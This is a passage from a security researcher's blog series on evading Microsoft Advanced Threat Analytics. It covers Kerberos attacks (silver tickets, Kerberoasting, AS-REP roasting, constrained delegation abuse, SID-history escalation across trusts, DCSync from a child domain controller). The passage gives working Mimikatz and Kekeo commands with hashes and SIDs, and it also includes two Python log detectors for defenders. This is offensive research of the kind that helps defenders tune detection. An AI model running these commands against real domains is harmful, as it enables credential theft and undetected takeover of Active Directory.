</b>If we get our hands on the NTLM hash of a service account, it is possible to create a TGS (Ticket Granting Service ticket) ourselves and present it to the service to get access. As we would be creating the TGS locally, there is no communication with the DC. Read more about the silver ticket attack <a href="https://digital-forensics.sans.org/blog/2014/11/24/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-more">in this post</a>. Now, if we are not talking to the DC, <b>ATA can't read the traffic and thus, there is no detection</b>. As simple as that!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxzZa4hqslO1cZ5MWYQlX2SPtGBFnoiSw62mcXDphmXkKe7LYXTe69U3fkSU15h5KfNIHdTXpUJvy8QkjQILPc-E_qgBsERxw0wiGa1j_E8xmxz2FuLetSYqqe94ADpAgbar0M8sqnSk/s1600/Silver_Ticket.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="778" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRxzZa4hqslO1cZ5MWYQlX2SPtGBFnoiSw62mcXDphmXkKe7LYXTe69U3fkSU15h5KfNIHdTXpUJvy8QkjQILPc-E_qgBsERxw0wiGa1j_E8xmxz2FuLetSYqqe94ADpAgbar0M8sqnSk/s400/Silver_Ticket.png" width="400" /></a></div>
<br />
<br />
What intrigued me during testing was that even if a silver ticket is used for a service running on the DC, ATA still won't detect it. We can use the NTLM/RC4 hash of the DC's machine account for some very interesting services like CIFS, WMI, PowerShell Remoting, LDAP etc. Since we already got DA access on Day 2, the ability to create a silver ticket for the DC is a decent persistence mechanism.<br />
<br />
Why is a silver ticket not detected even for the DC? I think ATA is currently interested only in authentication requests.<br />
<br />
<b>Kerberoast</b><br />
<b><br />
</b> The Kerberoast attack involves requesting a TGS from the DC for a service, saving the TGS (which is encrypted using the NTLM hash of the target service account) to a file and brute-forcing the NTLM hash offline. Read <a href="https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf">this</a> and <a href="https://adsecurity.org/?p=2293">this</a> article for more information.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5SN6_bGzJhzeAmDHAFmjXxMoSrl39N79ZETeXPhYAYmnkjdPZZttztxpGcL0YBxMZtElYi_v_AwQ4jk1M6q8Fe2FUxKXI9OBIDniSMP2UYew-l27tMg_c0dzHSu8hlVBTAWpQFX5N4Y/s1600/Kerberoast.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="778" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ5SN6_bGzJhzeAmDHAFmjXxMoSrl39N79ZETeXPhYAYmnkjdPZZttztxpGcL0YBxMZtElYi_v_AwQ4jk1M6q8Fe2FUxKXI9OBIDniSMP2UYew-l27tMg_c0dzHSu8hlVBTAWpQFX5N4Y/s400/Kerberoast.png" width="400" /></a></div>
<br />
The only communication with the DC is when the TGS is requested from the DC. The DC gets TGS requests all day and spotting an anomaly in such a regular request is, well, not easy.<br />
<br />
Actually, there is a chance for anomaly-based detection. Remember the encryption type we discussed on Day 3? A TGS request with encryption type 0x17 (RC4) may be used as an indicator of a ticket request for Kerberoasting. How? Let's use the below code to request a TGS for a service:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/ops-sqlsrvone.offensiveps.com"</textarea></pre>
This is how it looks in the logs:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEdborioSH-aFDIZR715wxVSBSbx6Dzx4-0uz-E22zCHQQP_P02O-wqleoMc-_0f2z1-BP0iqxcdgU40jGohJcDpADZr6cng0Ssu9V4EeHGWDJOgKHTHT4pddAOjaYfcGjP6vapt_mDIQ/s1600/Constrained-Delegation-RC4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="718" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEdborioSH-aFDIZR715wxVSBSbx6Dzx4-0uz-E22zCHQQP_P02O-wqleoMc-_0f2z1-BP0iqxcdgU40jGohJcDpADZr6cng0Ssu9V4EeHGWDJOgKHTHT4pddAOjaYfcGjP6vapt_mDIQ/s400/Constrained-Delegation-RC4.png" width="400" /></a></div>
But there are many legitimate uses (legacy applications, service accounts, trusts etc.) which still use RC4, so we can only hope that a future ATA release starts flagging TGS requests using RC4 as malicious in those environments where AES is prevalent.<br />
<br />
<b>Kerberoast Variants</b><br />
<br />
There are two Kerberoast variants which are helpful in active directory dominance.<br />
<br />
<b>AS-REP</b><br />
Request a TGT for an account with Kerberos Pre-Authentication disabled (or force-disable it if we have sufficient rights); the DC replies with a TGT (AS-REP) which has a part encrypted with the account's NTLM hash. Save it to disk and brute-force offline. Please read <a href="http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws">this</a> and <a href="http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/">this</a> post for a detailed explanation.<br />
<br />
ATA doesn't detect this. Is there any anomaly which can be seen? Yes!<br />
<br />
After enumerating users with Pre-Auth disabled, send AS-REQ and receive AS-REP with encrypted part:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Get-ASREPHash -UserName unixuser -Verbose</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZnPrtZMgCHQliN0OpbdyFF1KSUIauGrRksJ-yujgU0Q16xIAU5BIr05WDYhU8rf3-2a8CH1STg3TNRS_zBUlwGRh6rJ6qtY2R5Bv9Z2xzHBtcGEk0SmRzVun-iGxPGmzV-T5Eg5nFls/s1600/AS-REP-Roasting.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="1353" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZnPrtZMgCHQliN0OpbdyFF1KSUIauGrRksJ-yujgU0Q16xIAU5BIr05WDYhU8rf3-2a8CH1STg3TNRS_zBUlwGRh6rJ6qtY2R5Bv9Z2xzHBtcGEk0SmRzVun-iGxPGmzV-T5Eg5nFls/s320/AS-REP-Roasting.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how it looks in Wireshark:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHojEAvKTIoqURHO7xr9_c0BbkR8URn_W-up2JEFtFmqypN3rss8zt_yXG5_xEU67EfxVgMUH2w9MozQ2IxsdnG9GvTnZFsjMY2wN0zr-QhJqw2qN4Iq4b8CmQ5v6ZjbUW7pSKBf2kNA/s1600/AS-REP-RC4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="688" data-original-width="931" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHojEAvKTIoqURHO7xr9_c0BbkR8URn_W-up2JEFtFmqypN3rss8zt_yXG5_xEU67EfxVgMUH2w9MozQ2IxsdnG9GvTnZFsjMY2wN0zr-QhJqw2qN4Iq4b8CmQ5v6ZjbUW7pSKBf2kNA/s400/AS-REP-RC4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And this is how it is logged:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeqKMm6ScXDkJknr4R83xR-7XLCr0JZ4Jt2wsQd1ZeT_6IP0NPjaH60QWcYHgv0pvQBtEAu1k1FBUoom-H94_sqq3JTuDowxSAHreDV3UbkjeWtJshEFGLnqh8hYe42xfArSsxTx0km_A/s1600/AS-REP_Log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="384" data-original-width="417" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeqKMm6ScXDkJknr4R83xR-7XLCr0JZ4Jt2wsQd1ZeT_6IP0NPjaH60QWcYHgv0pvQBtEAu1k1FBUoom-H94_sqq3JTuDowxSAHreDV3UbkjeWtJshEFGLnqh8hYe42xfArSsxTx0km_A/s400/AS-REP_Log.png" width="400" /></a></div>
Hello RC4, we meet again :)<br />
<br />
As Will explains <a href="http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/">in this post</a>, cracking the RC4 encrypted part of an AS-REP is much easier than the AES one, so an attacker choosing AES is uncommon. An anomaly, if ATA would like to spot it :)<br />
<div>
<br /></div>
<b>Force SPN</b><br />
If we have enough privileges, it is possible to set a user's SPN to anything, request a TGS for that made up SPN and then, brute-force the ticket offline.<br />
<br />
Like in other TGS related attacks, a simple anomaly in this case could be the use of RC4:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jgciEAEtVOq7khXZAauvhcBRZ5S4v-Z-GpCMfEikba-c37Hje7EnbtRSNdu3Ch9WeRGBhGafntqGy4Zxs0JT7yxp7bHLH7qBy7O2MpBG-xFFiOz8NyuAxuSQgpTes1yo3gJCUTE5tf8/s1600/Force-SPN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="390" data-original-width="561" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6jgciEAEtVOq7khXZAauvhcBRZ5S4v-Z-GpCMfEikba-c37Hje7EnbtRSNdu3Ch9WeRGBhGafntqGy4Zxs0JT7yxp7bHLH7qBy7O2MpBG-xFFiOz8NyuAxuSQgpTes1yo3gJCUTE5tf8/s400/Force-SPN.png" width="400" /></a></div>
ATA doesn't detect it. The ATA team commented that abnormal behaviour detection will catch this and the AS-REP method when the brute-forced passwords are used to access a resource.<br />
<br />
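A defender-side check for the two RC4 indicators discussed above (the 0x17 TGS request for a user service account, and the AS-REP issued with no pre-authentication), as an added example that is not part of the original post: it parses the message text of Windows Security events 4769 (service ticket requested) and 4768 (TGT requested), flags the two patterns, and allowlists service accounts known to need RC4, which is the caveat raised above. The service account names, client address and allowlist entry are constructed for the sample.<br />

```python
import re
from dataclasses import dataclass

RC4_HMAC = 0x17   # Ticket Encryption Type logged for RC4-HMAC tickets
NO_PREAUTH = "0"  # 4768 Pre-Authentication Type 0: logon without pre-authentication

# Constructed (hypothetical) allowlist: service accounts known to need RC4 because
# of legacy applications, so their TGS requests do not page the SOC every day.
RC4_ALLOWLIST = {"legacyapp"}


@dataclass(frozen=True)
class Finding:
    event_id: int
    requester: str   # who asked: account (4769) or client address (4768)
    target: str      # service account (4769) or roasted user (4768)
    reason: str


def parse_message(message):
    """Turn the 'Field name:<tabs>value' lines of a 4768/4769 message into a dict."""
    fields = {}
    for line in message.splitlines():
        m = re.match(r"\s*([A-Za-z][A-Za-z -]*?):\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def enc_type(fields):
    """Ticket Encryption Type is logged as hex text ('0x17'); None if absent."""
    try:
        return int(fields.get("Ticket Encryption Type", ""), 16)
    except ValueError:
        return None


def check_tgs_request(fields):
    """4769: a successful RC4 TGS for a user (non-machine) service account."""
    if fields.get("Failure Code") != "0x0" or enc_type(fields) != RC4_HMAC:
        return None
    service = fields.get("Service Name", "")
    # Machine accounts, krbtgt and allowlisted legacy services: not the roast pattern.
    if service.endswith("$") or service.lower() == "krbtgt" or service.lower() in RC4_ALLOWLIST:
        return None
    return Finding(4769, fields.get("Account Name", ""), service,
                   "RC4 TGS requested for a user service account (possible Kerberoast)")


def check_tgt_request(fields):
    """4768: a successful TGT issued without pre-authentication, RC4 encrypted."""
    if fields.get("Result Code") != "0x0" or enc_type(fields) != RC4_HMAC:
        return None
    if fields.get("Pre-Authentication Type") != NO_PREAUTH:
        return None
    return Finding(4768, fields.get("Client Address", ""), fields.get("Account Name", ""),
                   "AS-REP issued without pre-authentication, RC4 encrypted (possible AS-REP roast)")


CHECKS = {4769: check_tgs_request, 4768: check_tgt_request}


def scan(events):
    """events: iterable of (event_id, message_text). Returns findings in input order."""
    findings = []
    for event_id, message in events:
        check = CHECKS.get(event_id)
        if check:
            finding = check(parse_message(message))
            if finding:
                findings.append(finding)
    return findings


# --- constructed sample events (lab names from the post, values made up) ---
def tgs_message(account, service, enc, failure="0x0"):
    return (f"A Kerberos service ticket was requested.\n"
            f"\tAccount Name:\t\t{account}\n\tService Name:\t\t{service}\n"
            f"\tClient Address:\t\t::ffff:10.0.0.11\n"
            f"\tTicket Encryption Type:\t{enc}\n\tFailure Code:\t\t{failure}\n")


def tgt_message(account, preauth, enc, result="0x0"):
    return (f"A Kerberos authentication ticket (TGT) was requested.\n"
            f"\tAccount Name:\t\t{account}\n\tClient Address:\t\t::ffff:10.0.0.11\n"
            f"\tTicket Encryption Type:\t{enc}\n\tPre-Authentication Type:\t{preauth}\n"
            f"\tResult Code:\t\t{result}\n")


SAMPLE_EVENTS = [
    (4769, tgs_message("labuser@OFFENSIVEPS.COM", "sqlsvc", "0x17")),          # flagged
    (4769, tgs_message("labuser@OFFENSIVEPS.COM", "sqlsvc", "0x12")),          # AES: normal
    (4769, tgs_message("labuser@OFFENSIVEPS.COM", "OPS-SQLSRVONE$", "0x17")),  # machine account
    (4769, tgs_message("labuser@OFFENSIVEPS.COM", "legacyapp", "0x17")),       # allowlisted
    (4768, tgt_message("unixuser", "0", "0x17")),                              # flagged
    (4768, tgt_message("labuser", "2", "0x12")),                               # pre-auth + AES
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.event_id}: {f.reason}: {f.requester} -> {f.target}")
```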
<b>SQL Server</b><br />
<br />
Targeting SQL servers and staying within the database server makes sure that there is no communication with the DC and therefore avoids ATA. I wrote a post a couple of months back on <a href="http://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html">lateral movement within the database layer</a>.<br />
<br />
That is all for Day 4. Hope you enjoyed it!<br />
<br />
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com1tag:blogger.com,1999:blog-8135211063584500909.post-59103380334361764292017-08-09T20:49:00.000+05:302018-05-03T22:15:43.917+05:30Week of Evading Microsoft ATA - Day 3 - Constrained Delegation, Attacks across trusts, DCSync and DNSAdmins<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 3 of Week of Evading Microsoft ATA. The week has been split into the following days:</div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html">Day 1 - Introduction, detection and bypassing/avoiding Recon and Brute-force detection</a></b><br />
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day2.html">Day 2 - Detection and bypass of overpass-the-hash and golden ticket</a></b></div>
<div style="text-align: justify;">
<b>Day 3 - Bypasses/avoidance using more Kerberos attacks and attacks across trusts</b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day4.html">Day 4 - Bypasses/avoidance by reducing conversation with the DC</a></b></div>
<div style="text-align: justify;">
<b><a href="http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day5.html">Day 5 - Attacking ATA deployment, limitations of research and mitigation</a></b><br />
<b><br />
</b>On Day 3, let's see some more Kerberos attacks which can be used to bypass ATA. Also, since we already escalated to DA on Day 2, we will discuss attacks across domain trusts which are not detected by ATA.<br />
<br />
<b>Constrained Delegation</b><br />
Constrained delegation allows access to a service by impersonating *any* user if the service account is configured for it (msDS-AllowedToDelegateTo). You can read more about this attack <a href="https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/">here</a>, <a href="http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/">here </a>and <a href="https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more">here</a>. All three are fantastic posts, please go through them to understand the attack.<br />
<br />
ATA doesn't detect this attack. Why? Read on.<br />
<br />
If we abuse constrained delegation with the help of <a href="https://github.com/gentilkiwi/kekeo">Kekeo</a>:<br />
<br />
Request a TGT:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop\Kekeo> .\asktgt.exe /user:termadmin /domain:offensiveps.com /key:2a758732e0f664f48a5747a9b12345ab /ticket:termadmin.kirbi</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn6xuvXUiGQ-wI0yQeW8r8FeOFTqBpZwbWzg-ZPvAZzvp5nKMqwPxFb3jVLaJfYysXYWG_bFSRVzyvMAKlM1e6dCmgQG4Fk5L3suwkGDs9jz8MEZGDQ6DFqlo0gQVocXhp-E4PIUiXpdY/s1600/Constrained-Delegation-AS_REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="925" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn6xuvXUiGQ-wI0yQeW8r8FeOFTqBpZwbWzg-ZPvAZzvp5nKMqwPxFb3jVLaJfYysXYWG_bFSRVzyvMAKlM1e6dCmgQG4Fk5L3suwkGDs9jz8MEZGDQ6DFqlo0gQVocXhp-E4PIUiXpdY/s400/Constrained-Delegation-AS_REQ.png" width="400" /></a></div>
Request a TGS as Administrator using the above TGT:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop\Kekeo> .\s4u.exe /tgt:termadmin.kirbi /user:Administrator@offensiveps.com /service:cifs/ops-sqlsrvone.offensiveps.com</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3DMp31wBrS8cOed8tjzmR9OPsLSWwSkzjKgJN-fWOM8DgBKASsyUro-Myq9wyfvIKe9mHZ3Fi4ysc9xyOqTOfdpoTVLT_FutlzqKyooKHpVp-xLSJZkQfE08iks8M6I8MAaCQoVpg0l8/s1600/Constrained-Delegation-TGS_REQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="402" data-original-width="491" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3DMp31wBrS8cOed8tjzmR9OPsLSWwSkzjKgJN-fWOM8DgBKASsyUro-Myq9wyfvIKe9mHZ3Fi4ysc9xyOqTOfdpoTVLT_FutlzqKyooKHpVp-xLSJZkQfE08iks8M6I8MAaCQoVpg0l8/s400/Constrained-Delegation-TGS_REQ.png" width="400" /></a></div>
Encryption type 0x17 means RC4-HMAC. See <a href="https://blogs.technet.microsoft.com/askds/2010/10/19/hunting-down-des-in-order-to-securely-deploy-kerberos/">this article.</a><br />
<br />
Now, is 0x17 an anomaly? Not really. Even though AES has been supported since Server 2008, service accounts, inter-domain tickets and inter-forest tickets still use RC4 encryption. So, as far as TGS_REQ is concerned, there is no downgrade for ATA to detect by default.<br />
<br />
Once we have the TGS, it can be used in the current session to access the service:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::ptt cifs.ops-sqlsrvone.offensiveps.com.kirbi"'
PS C:\Users\labuser\Desktop> ls \\ops-sqlsrvone\c$
</textarea></pre>
<br />
Even if we force-enable AES on the service account, ATA doesn't detect it: the entire domain (trusts, legacy machines etc. still use RC4) would have to move to AES before 0x17 can be considered an anomaly.<br />
<br />
I think there is one chance of detection: while requesting the TGT, there is an encryption downgrade in the AS-REQ packet (see the screenshot above). But it is up to the ATA team to tune it and make the detection reliable.<br />
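A toy version of the "downgraded based on previously learned behavior" logic behind the Day 2 overpass-the-hash alert, applied to the AS-REQ downgrade noted here; this is an added example, not part of the original post and not ATA's own code. It learns, per account and client host, the strongest encryption type seen in the first few TGT requests (as logged in the 4768 Ticket Encryption Type field) and alerts only when a later request is weaker, which also shows why an account that has always used RC4 never trips it. Apart from tempda and OPS-USER11 from the post's lab, the names and values are constructed.<br />

```python
from collections import defaultdict

# Kerberos enctype ids as logged in the Ticket Encryption Type field of events
# 4768/4769, ranked by strength: RC4-HMAC (0x17) < AES128 (0x11) < AES256 (0x12).
ENC_STRENGTH = {0x17: 1, 0x11: 2, 0x12: 3}
ENC_NAME = {0x17: "RC4-HMAC", 0x11: "AES128-CTS", 0x12: "AES256-CTS"}


class DowngradeDetector:
    """Learns the strongest enctype each (account, host) pair normally uses,
    then flags a TGT request that is weaker than that learned baseline."""

    def __init__(self, min_observations=3):
        self.min_observations = min_observations
        self.strongest = {}             # (account, host) -> strongest enctype seen
        self.seen = defaultdict(int)    # (account, host) -> requests learned from

    def _learn(self, key, enc):
        self.seen[key] += 1
        best = self.strongest.get(key)
        if best is None or ENC_STRENGTH.get(enc, 0) > ENC_STRENGTH.get(best, 0):
            self.strongest[key] = enc

    def observe(self, account, host, enc):
        """Feed one TGT request (account, client host, enctype). Returns an alert
        string, or None when the request matches previously learned behaviour."""
        key = (account, host)
        if self.seen[key] < self.min_observations:
            self._learn(key, enc)       # still learning this pair: never alert
            return None
        best = self.strongest[key]
        if ENC_STRENGTH.get(enc, 0) < ENC_STRENGTH.get(best, 0):
            # Weaker than anything learned: the downgrade ATA alerted on.
            # Deliberately not learned, or the attacker could re-train the baseline.
            return (f"Encryption downgrade for {account} from {host}: "
                    f"learned {ENC_NAME.get(best, hex(best))}, now {ENC_NAME.get(enc, hex(enc))}")
        self._learn(key, enc)
        return None


def replay(events, min_observations=3):
    """Run the detector over (account, host, enctype) tuples in order; return alerts."""
    det = DowngradeDetector(min_observations)
    return [alert for alert in (det.observe(*e) for e in events) if alert]


# Constructed sample timeline: tempda and OPS-USER11 are the post's lab names,
# legacysvc and OPS-APP01 are hypothetical; all enctype values are made up.
SAMPLE_EVENTS = [
    ("tempda", "OPS-USER11", 0x12),     # normal logons with AES256: the baseline
    ("tempda", "OPS-USER11", 0x12),
    ("tempda", "OPS-USER11", 0x12),
    ("tempda", "OPS-USER11", 0x17),     # AS-REQ now RC4: the Day 2 alert
    ("tempda", "OPS-USER11", 0x12),     # back to AES: matches the baseline, no alert
    ("legacysvc", "OPS-APP01", 0x17),   # has always used RC4, so there is no
    ("legacysvc", "OPS-APP01", 0x17),   # downgrade to see: the gap described
    ("legacysvc", "OPS-APP01", 0x17),   # above for trusts and service accounts
    ("legacysvc", "OPS-APP01", 0x17),
]

if __name__ == "__main__":
    for alert in replay(SAMPLE_EVENTS):
        print(alert)
```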
<br />
Also, there is no detection for alternate tickets. It is possible to access any service running with the same service account as the service for which constrained delegation is enabled. See the section "Server SPN target name validation level" in <a href="https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more">this article</a>. That means, if we have access to a service like time on the domain controller using constrained delegation, we can request a TGS for a service like HOST (scheduled tasks and many others), RPCSS (WMI) or CIFS (file server), take over the DC completely, and ATA won't detect it. <br />
<br />
But please keep in mind that if we access the LDAP service and try to run the DCSync attack (replication), ATA will detect it. In fact, during my testing, I found out that DCSync is one of those attacks which ATA rarely misses.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNsOeCRZw9ymj1tYoamSrtjgkMkqYNtfQos_SyQPn62af_ZNx7oBS8fKK5G_rLTe4ecjH_PFvZxJbAplNAdR1Cd52mocigOFzY3oLT96wFbeNgYK9zKIHrEJEZxNqwwCUBT-NjjNA3uwI/s1600/DCSync.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="352" data-original-width="1227" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNsOeCRZw9ymj1tYoamSrtjgkMkqYNtfQos_SyQPn62af_ZNx7oBS8fKK5G_rLTe4ecjH_PFvZxJbAplNAdR1Cd52mocigOFzY3oLT96wFbeNgYK9zKIHrEJEZxNqwwCUBT-NjjNA3uwI/s400/DCSync.png" width="400" /></a></div>
The above is based on my understanding of constrained delegation and service accounts. Please correct me if I messed up something :)<br />
<br />
The ATA team commented that they are "currently working on detecting abnormal delegation usage".<br />
<br />
<b>Attacks Across Trusts</b><br />
<b><br />
</b> Let's discuss a couple of attacks across domain trusts. Many attacks across domain trusts are not detected; that inter-domain tickets use RC4 is one of the reasons for this. We will discuss only two of the most interesting attacks: escalation from domain to forest root, and DCSync (replication) without detection.<br />
<br />
<b>Escalation from domain DA to forest root enterprise admin</b><br />
<br />
It is well known that if we have DA access to one of the domains of a forest, it is possible to escalate privileges to the enterprise admin of the forest root. Read Sean's <a href="https://adsecurity.org/?p=1588">blog post here</a> to understand the attack.<br />
<br />
To use this attack, we just need the krbtgt hash of the current domain and some other information (domain SID, parent domain SID etc.) which is available to any normal user in Active Directory. We forge an inter-domain TGT, sign and encrypt it with the krbtgt hash of the child domain so that it validates, and append SID history. When the parent DC receives this TGT for accessing a service in the parent domain, it reads the SID history and, if it is set to Enterprise Admins, we are granted that privilege.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\labuser\Desktop> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:childone.offensiveps.com /sid:S-1-5-21-1330358098-3724148463-1077246548 /krbtgt:d0cc884b251ef9bd34c439ec123456u8 /sids:S-1-5-21-3270384115-3177237293-604223748-519 /ptt"'
</textarea></pre>
<br />
Now, this is how the network capture looks on the child DC when the above attack is executed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih4fDCYRVES1kopy1_qRzSgG355vN6QGrhJdhLH1WkZXz0bY7pzTKzJUo2Qe0CgbSMdnh-lyRbpTXdDU0SLM2-fnccg6RM7LapsT59XcB5VRMsKsDDRF-X_qeSt1w4zb8Jkr9TqCxKe9o/s1600/Across-Trust-Edited.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="879" data-original-width="1562" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih4fDCYRVES1kopy1_qRzSgG355vN6QGrhJdhLH1WkZXz0bY7pzTKzJUo2Qe0CgbSMdnh-lyRbpTXdDU0SLM2-fnccg6RM7LapsT59XcB5VRMsKsDDRF-X_qeSt1w4zb8Jkr9TqCxKe9o/s400/Across-Trust-Edited.png" width="400" /></a></div>
Because domain trusts use RC4 encryption by default, what we see above is NOT a downgrade. To make this an anomaly, AES support would have to be enabled in the trust properties in Active Directory Domains and Trusts:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNd7SMyC3FvyoEJjJywOBx7DxEnBZ0jqK-IbicoEapBOq1j7-ZPywx5W7DxDbQEPJLnghuks6Nq4j5HJ57lsIu6kLmuYYhetBWatTjGBIgahIHsTkKqEqxF7XoEW4YxAruJFBslEWb38I/s1600/Domain_Trusts.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1091" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNd7SMyC3FvyoEJjJywOBx7DxEnBZ0jqK-IbicoEapBOq1j7-ZPywx5W7DxDbQEPJLnghuks6Nq4j5HJ57lsIu6kLmuYYhetBWatTjGBIgahIHsTkKqEqxF7XoEW4YxAruJFBslEWb38I/s400/Domain_Trusts.png" width="400" /></a></div>
ATA currently does not take into account if AES is enabled for a trust.<br />
<br />
<b>DCSync across trust</b><br />
<br />
As I stated earlier, DCSync is rarely missed by ATA. But if it is done from a child domain controller, DCSync is not detected by ATA, which makes sense as domain controllers replicate stuff all the time. Since we escalated to Enterprise Admin above, we have sufficient privileges to do so.<br />
<br />
First, using a golden ticket or overpass-the-hash, escalate privileges to DA on a member machine of child domain. Then run the below command from the member machine:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\Users\childuser\Desktop> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:offensiveps.com /user:opsdc\krbtgt"' -ComputerName childone-dc </textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMok3A2rZPafoUrJYXHYFt8O-v_K6Q2rfrcISk9d8IbUK9OUUVIIuE17zNs595ZBjjk9e7eoHfQYhqV3VqagFeE_BnZSKMGWvwkQXQ0a3L3HOlfb7cHvCtRbG_UTSeYhdrtYtbGZiZpT4/s1600/DCSync.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="988" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMok3A2rZPafoUrJYXHYFt8O-v_K6Q2rfrcISk9d8IbUK9OUUVIIuE17zNs595ZBjjk9e7eoHfQYhqV3VqagFeE_BnZSKMGWvwkQXQ0a3L3HOlfb7cHvCtRbG_UTSeYhdrtYtbGZiZpT4/s400/DCSync.png" width="400" /></a></div>
ATA does not detect this! :)<br />
